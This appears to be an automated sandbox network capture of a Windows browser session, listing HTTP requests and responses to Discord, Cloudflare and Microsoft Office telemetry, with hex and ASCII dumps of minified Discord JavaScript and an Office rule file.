                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 6c 65 74 7b 6d 66 61 43 68 61 6c 6c 65 6e 67 65 3a 74 2c 66 69 6e 69 73 68 3a 6e 2c 73 65 74 53 6c 69 64 65 3a 61 2c 6f 6e 43 6c 6f 73 65 3a 64 2c 69 73 53 6c 69 64 65 52 65 61 64 79 3a 75 7d 3d 65 2c 5b 63 2c 68 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 5b 66 2c 6d 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 6e 75 6c 6c 29 2c 5b 67 2c 53 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 22 22 29 2c 78 3d 69 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 69 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 75 29 7b 76 61 72 20 65 3b 6e 75 6c 6c 3d 3d 3d 28 65 3d 78 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 66 6f 63 75 73 28 29 7d 7d 2c 5b 75 5d 29 2c 28 30 2c
                                                                                                                                                                                                                                                                                    Data Ascii: );function a(e){let{mfaChallenge:t,finish:n,setSlide:a,onClose:d,isSlideReady:u}=e,[c,h]=i.useState(!1),[f,m]=i.useState(null),[g,S]=i.useState(""),x=i.useRef(null);return i.useEffect(()=>{if(u){var e;null===(e=x.current)||void 0===e||e.focus()}},[u]),(0,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 78 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 61 2e 6c 69 73 74 49 74 65 6d 54 65 78 74 2c 76 61 72 69 61 6e 74 3a 22 74 65 78 74 2d 6d 64 2f 73 65 6d 69 62 6f 6c 64 22 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 50 5b 65 2e 74 79 70 65 5d 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 69 2e 43 68 65 76 72 6f 6e 53 6d 61 6c 6c 52 69 67 68 74 49 63 6f 6e 2c 7b 73 69 7a 65 3a 22 63 75 73 74 6f 6d 22 2c 63 6f 6c 6f 72 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 77 69 64 74 68 3a 32 30 2c 68 65 69 67 68 74 3a 32 30 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 2e 6c 69 73 74 49 74 65 6d 41 72 72 6f 77 7d 29 5d 7d 2c 65 2e 74 79 70 65 29 29 7d 29 5d 7d 29 7d 7d 2c 31 36 30 35 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                    Data Ascii: xt,{className:a.listItemText,variant:"text-md/semibold",children:s.P[e.type]}),(0,l.jsx)(i.ChevronSmallRightIcon,{size:"custom",color:"currentColor",width:20,height:20,className:a.listItemArrow})]},e.type))})]})}},160511:function(e,t,n){n.d(t,{Z:function(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 28 6f 2e 46 6f 72 6d 49 74 65 6d 2c 7b 74 69 74 6c 65 3a 75 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 75 2e 74 2e 48 5a 50 42 4f 54 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 63 2e 73 6d 73 49 6e 70 75 74 43 6f 6e 74 61 69 6e 65 72 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 6f 2e 54 65 78 74 49 6e 70 75 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 63 2e 73 6d 73 49 6e 70 75 74 2c 69 6e 70 75 74 52 65 66 3a 45 2c 6f 6e 43 68 61 6e 67 65 3a 5a 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 75 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 75 2e 74 2e 74 41 52 7a 67 6f 29 2c 6d 61 78 4c 65 6e 67 74 68 3a 31 30 2c 76 61 6c 75 65 3a 79 2c 61 75 74 6f 43 6f 6d 70 6c 65 74 65 3a 22 6f 6e 65
                                                                                                                                                                                                                                                                                    Data Ascii: (o.FormItem,{title:u.intl.string(u.t.HZPBOT),children:[(0,l.jsxs)("div",{className:c.smsInputContainer,children:[(0,l.jsx)(o.TextInput,{className:c.smsInput,inputRef:E,onChange:Z,placeholder:u.intl.string(u.t.tARzgo),maxLength:10,value:y,autoComplete:"one
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1369INData Raw: 29 3d 3e 7b 66 28 21 31 29 7d 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 6f 2e 5a 2e 53 6c 69 64 65 48 65 61 64 65 72 2c 7b 6f 6e 43 6c 6f 73 65 3a 75 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 6f 2e 5a 2e 53 6c 69 64 65 43 6f 6e 74 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 73 29 28 73 2e 46 6f 72 6d 49 74 65 6d 2c 7b 74 69 74 6c 65 3a 61 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 61 2e 74 2e 48 5a 50 42 4f 54 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 54 65 78 74 49 6e 70 75 74 2c 7b 69 6e 70 75 74 52 65 66 3a 76 2c 6f 6e 43 68 61 6e 67 65 3a 78 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 61 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 61 2e 74 2e 74 41 52 7a 67 6f 29 2c 6d 61 78 4c 65 6e 67 74
                                                                                                                                                                                                                                                                                    Data Ascii: )=>{f(!1)})},children:[(0,l.jsx)(o.Z.SlideHeader,{onClose:u}),(0,l.jsx)(o.Z.SlideContent,{children:(0,l.jsxs)(s.FormItem,{title:a.intl.string(a.t.HZPBOT),children:[(0,l.jsx)(s.TextInput,{inputRef:v,onChange:x,placeholder:a.intl.string(a.t.tARzgo),maxLengt
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC1049INData Raw: 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 42 75 74 74 6f 6e 2c 7b 73 75 62 6d 69 74 74 69 6e 67 3a 67 2c 6f 6e 43 6c 69 63 6b 3a 6a 2c 63 68 69 6c 64 72 65 6e 3a 68 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 68 2e 74 2e 58 72 33 45 6b 70 29 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 5a 2e 53 6c 69 64 65 45 72 72 6f 72 2c 7b 65 72 72 6f 72 3a 78 7d 29 5d 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 5a 2e 53 6c 69 64 65 46 6f 6f 74 65 72 2c 7b 6d 66 61 43 68 61 6c 6c 65 6e 67 65 3a 74 2c 73 65 74 53 6c 69 64 65 3a 66 7d 29 5d 7d 29 7d 7d 2c 36 35 38 35 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 47 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 50 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                                                                                                                                                                                                                                    Data Ascii: ldren:[(0,l.jsx)(s.Button,{submitting:g,onClick:j,children:h.intl.string(h.t.Xr3Ekp)}),(0,l.jsx)(u.Z.SlideError,{error:x})]}),(0,l.jsx)(u.Z.SlideFooter,{mfaChallenge:t,setSlide:f})]})}},658550:function(e,t,n){n.d(t,{Gz:function(){return o},P0:function(){r


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    92192.168.2.549814162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC918OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/8e73d00e4bfe422e HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 15790
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC15790OUTData Raw: 7b 22 77 70 22 3a 22 4c 49 46 4a 33 59 7a 68 33 65 46 33 78 66 36 7a 73 7a 6c 6a 53 4a 59 52 6a 4d 35 6a 30 67 30 61 61 59 68 7a 39 6f 6a 69 71 52 54 71 6b 46 6a 72 69 32 2d 36 71 65 7a 58 6a 78 73 46 41 44 49 49 6a 4d 6e 61 6a 4f 6a 61 52 61 46 7a 6a 37 61 7a 45 36 64 4a 6e 65 49 43 77 51 4a 69 71 57 49 35 4d 4b 58 6c 66 4c 6a 59 2b 7a 57 6a 53 46 6a 66 76 61 59 2d 6a 4a 4e 78 73 49 72 6a 4f 4a 59 73 2b 4a 7a 49 4d 37 6a 6d 71 49 78 6c 6f 6a 6e 57 73 69 6a 7a 34 38 6a 7a 4d 76 66 4a 76 7a 6a 6a 54 6f 69 49 69 36 6c 31 54 7a 33 35 53 2d 47 61 32 41 35 2b 6c 46 71 44 6a 42 61 7a 6b 6a 43 36 6a 4f 61 36 65 59 72 34 51 6f 33 4a 76 46 71 57 58 42 33 61 6a 78 56 32 72 6b 57 7a 5a 2b 31 6a 42 2d 67 36 76 4a 41 71 67 5a 61 6a 57 46 67 48 41 36 65 75 56 4a 66 2d
                                                                                                                                                                                                                                                                                    Data Ascii: {"wp":"LIFJ3Yzh3eF3xf6zszljSJYRjM5j0g0aaYhz9ojiqRTqkFjri2-6qezXjxsFADIIjMnajOjaRaFzj7azE6dJneICwQJiqWI5MKXlfLjY+zWjSFjfvaY-jJNxsIrjOJYs+JzIM7jmqIxlojnWsijz48jzMvfJvzjjToiIi6l1Tz35S-Ga2A5+lFqDjBazkjC6jOa6eYr4Qo3JvFqWXB3ajxV2rkWzZ+1jB-g6vJAqgZajWFgHA6euVJf-
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1348INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.discord.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ; Path=/; Expires=Sun, 23-Nov-25 20:12:47 GMT; Domain=.discord.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0t0AAmjuDvbtNaTpUjlsMQMxbAsISBpPolQ%2Bts4EUcoOIjYpm3oQsLH8ERLh4TiHZaZDT3xcFfcPdCuMlBgjkuTn%2BUhRkut%2BT0Vkld22KViNsQVI3%2FWvVoa4e2v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0e92d6841d9-EWR
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    93192.168.2.54981535.190.80.14437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:46 UTC534OUTOPTIONS /report/v4?s=Z%2B8R1Vw7jO8CNTB26TuvtTZyw%2FX%2F9%2BYb2Jtl8c%2Fjygm8rWhImdfyTtR4LvsdH9Qv3jYRSb%2Fc3zlK8L%2FTlJ8HoAvuQhIGPg5qOlJAutjvUdZh%2FSNo5N%2FGBitA31cB HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                    access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                                                    date: Sat, 23 Nov 2024 20:12:47 GMT
                                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    94192.168.2.54981313.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201247Z-178bfbc474bnwsh4hC1NYC2ubs000000052g000000004ntc
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    95192.168.2.549822162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC673OUTGET /assets/1bab9b095996b8d024ce.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC968INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 7078
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ee7aab4373-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "45a3ee5ff96bdb2dd7fbb2846b5ea494"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 18 Jun 2024 19:13:27 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAryTncAL2nVjODEQUIJuJ9qc3M3s6FItr3igmWjtg9wakHV5YEByKnmAfPs%2Fg1E4ISaJbIHRoPVnG%2F419DCNzg85A97%2FKjQXxxHFHi90vvqBJkUgNzVpP5GTrK8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC401INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 33 32 32 32 22 5d 2c 7b 33 34 30 36 31 38 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 33 35 34 38 34 38 29 2c 6e 3d 53 74 72 69 6e 67 2c 63 3d 54 79 70 65 45 72 72 6f 72 3b 72 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 7c 7c 65 28 72 29 29 72 65 74 75 72 6e 20 72 3b 74 68 72 6f 77 20 63 28 22 43 61 6e 27 74 20 73 65 74 20 22 2b 6e 28 72 29 2b 22 20 61 73 20 61 20 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43222"],{340618:function(r,t,o){var e=o(354848),n=String,c=TypeError;r.exports=function(r){if("object"==typeof r||e(r))return r;throw c("Can't set "+n(r)+" as a prototype
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1369INData Raw: 21 3d 3d 72 2e 70 72 6f 74 6f 74 79 70 65 7d 29 7d 2c 33 33 39 39 35 3a 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 2e 65 78 70 6f 72 74 73 3d 7b 49 6e 64 65 78 53 69 7a 65 45 72 72 6f 72 3a 7b 73 3a 22 49 4e 44 45 58 5f 53 49 5a 45 5f 45 52 52 22 2c 63 3a 31 2c 6d 3a 31 7d 2c 44 4f 4d 53 74 72 69 6e 67 53 69 7a 65 45 72 72 6f 72 3a 7b 73 3a 22 44 4f 4d 53 54 52 49 4e 47 5f 53 49 5a 45 5f 45 52 52 22 2c 63 3a 32 2c 6d 3a 30 7d 2c 48 69 65 72 61 72 63 68 79 52 65 71 75 65 73 74 45 72 72 6f 72 3a 7b 73 3a 22 48 49 45 52 41 52 43 48 59 5f 52 45 51 55 45 53 54 5f 45 52 52 22 2c 63 3a 33 2c 6d 3a 31 7d 2c 57 72 6f 6e 67 44 6f 63 75 6d 65 6e 74 45 72 72 6f 72 3a 7b 73 3a 22 57 52 4f 4e 47 5f 44 4f 43 55 4d 45 4e 54 5f 45 52 52 22 2c 63 3a 34 2c 6d 3a 31 7d 2c 49 6e
                                                                                                                                                                                                                                                                                    Data Ascii: !==r.prototype})},33995:function(r){r.exports={IndexSizeError:{s:"INDEX_SIZE_ERR",c:1,m:1},DOMStringSizeError:{s:"DOMSTRING_SIZE_ERR",c:2,m:0},HierarchyRequestError:{s:"HIERARCHY_REQUEST_ERR",c:3,m:1},WrongDocumentError:{s:"WRONG_DOCUMENT_ERR",c:4,m:1},In
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1369INData Raw: 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 6e 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 5b 6f 5d 29 29 7d 63 61 74 63 68 28 72 29 7b 7d 7d 7d 2c 36 32 30 36 32 33 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 35 34 35 35 37 36 29 3b 72 2e 65 78 70 6f 72 74 73 3d 65 28 22 64 6f 63 75 6d 65 6e 74 22 2c 22 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 22 29 7d 2c 38 37 34 36 35 32 3a 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 2e 65 78 70 6f 72 74 73 3d 7b 7d 7d 2c 38 30 33 39 33 38 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 6f 29 7b 76 61 72 20 65 2c 6e 3d 6f 28 32 34 30 33 33 29 2c 63 3d 6f 28 39 34 35 36 37 29 2c 69 3d 6f 28 32 30 32 32 33 34 29 2c 75 3d 6f 28 36 32
                                                                                                                                                                                                                                                                                    Data Ascii: {try{return e(n(Object.getOwnPropertyDescriptor(r,t)[o]))}catch(r){}}},620623:function(r,t,o){var e=o(545576);r.exports=e("document","documentElement")},874652:function(r){r.exports={}},803938:function(r,t,o){var e,n=o(24033),c=o(94567),i=o(202234),u=o(62
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC1369INData Raw: 69 6f 6e 28 72 29 7b 76 61 72 20 74 3d 63 28 72 29 3b 69 66 28 65 28 74 2c 61 29 29 72 65 74 75 72 6e 20 74 5b 61 5d 3b 76 61 72 20 6f 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 20 6e 28 6f 29 26 26 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 6f 2e 70 72 6f 74 6f 74 79 70 65 3a 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 66 3f 45 3a 6e 75 6c 6c 7d 7d 2c 38 33 35 38 38 34 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 32 32 32 35 33 31 29 2c 6e 3d 6f 28 32 30 32 32 33 34 29 3b 72 2e 65 78 70 6f 72 74 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 65 28 72 2c 6e 29 7d 7d 2c 32 37 36 33 32 31 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 6f 29 7b 76 61 72 20 65 3d
